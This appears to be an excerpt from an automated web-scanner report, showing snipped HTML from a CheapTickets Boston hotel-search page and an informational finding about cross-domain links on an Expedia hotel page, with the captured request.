<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="starRating" />
   
                                       (6)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="starRating" />
   
                                       (36)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="starRating" />
   
                                       (87)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="starRating" />
   
                                       (37)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="starRating" />
   
                                       (4)</span>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=317971&hotel.hkey=317971_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/971/317971/Crowne-Plaza-Hotel-BOSTON-NEWTON-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=319853&hotel.hkey=319853_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/853/319853/W-Boston-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
<div class="specialOffers" >
        <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=50080&hotel.hkey=50080_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/080/50080/Super-8-WeymouthBoston-Area-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
<div class="specialOffers" >
        <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=21445&hotel.hkey=21445_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=83803&hotel.hkey=83803_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/803/83803/Quality-Inn-Suites-Hotel-Exterior-1-20110806-224126-082_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=32679&hotel.hkey=32679_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/679/32679/Sheraton-Colonial-Boston-North-Hotel-Conference-Center-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=2042&hotel.hkey=2042_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/042/2042/Hampton-Inn-BostonBraintree-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=7222&hotel.hkey=7222_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/222/7222/Hampton-Inn-BostonLogan-Airport-Hotel-Exterior-41_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=65358&hotel.hkey=65358_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/358/65358/Candlewood-Suites-BOSTON-BURLINGTON-Hotel-Exterior-4_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=126192&hotel.hkey=126192_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/192/126192/Homestead-Boston-Burlington-Hotel-Exterior-1-20110806-191241-564_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=16123&hotel.hkey=16123_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/123/16123/Hilton-BostonDedham-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=28337&hotel.hkey=28337_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/337/28337/Motel-6-Boston-North-Danvers-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=46267&hotel.hkey=46267_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/267/46267/Staybridge-Suites-BOSTON-BURLINGTON-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=48073&hotel.hkey=48073_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/073/48073/Econo-Lodge-Malden-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=130650&hotel.hkey=130650_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/650/130650/Hilton-Garden-Inn-BostonBurlington-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=42996&hotel.hkey=42996_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/996/42996/Red-Roof-Inn-Boston-Woburn-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=9964&hotel.hkey=9964_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/964/9964/Red-Roof-Inn-Boston-Logan-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=229656&hotel.hkey=229656_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/570/67570/364635911/TBNL0-20110329-120058-663.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=104806&hotel.hkey=104806_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/806/104806/Holiday-Inn-Select-BOSTON-WOBURN-Hotel-Exterior-1-20110806-190117-024_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=11852&hotel.hkey=11852_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/852/11852/ESA-Boston-Braintree-Hotel-Exterior-1-20110805-191025-990_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=114000&hotel.hkey=114000_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/000/114000/BEST-WESTERN-PLUS-New-Englander-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=235019&hotel.hkey=235019_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/019/235019/The-Copley-Square-Hotel-Hotel-Exterior-13_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=35100&hotel.hkey=35100_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/100/35100/Millennium-Bostonian-Hotel-Boston-Hotel-Exterior-6_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=206519&hotel.hkey=206519_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/519/206519/Hampton-Inn-Boston-Norwood-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=209228&hotel.hkey=209228_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/228/209228/Hilton-BostonWoburn-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" /> </a>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<li class="first"><a href="http://corp.orbitz.com" rel="nofollow">About Us</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://corp.orbitz.com/careers" rel="nofollow">Careers</a></li>
       <li><a href="http://pressroom.orbitz.com/" rel="nofollow">Media</a></li>
       <li><a href="http://corp.orbitz.com/partnerships/advertise.html" rel="nofollow">Advertising</a>
...[SNIP]...
<div class="security">
        <a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.cheaptickets.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.cheaptickets.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
19.185. http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
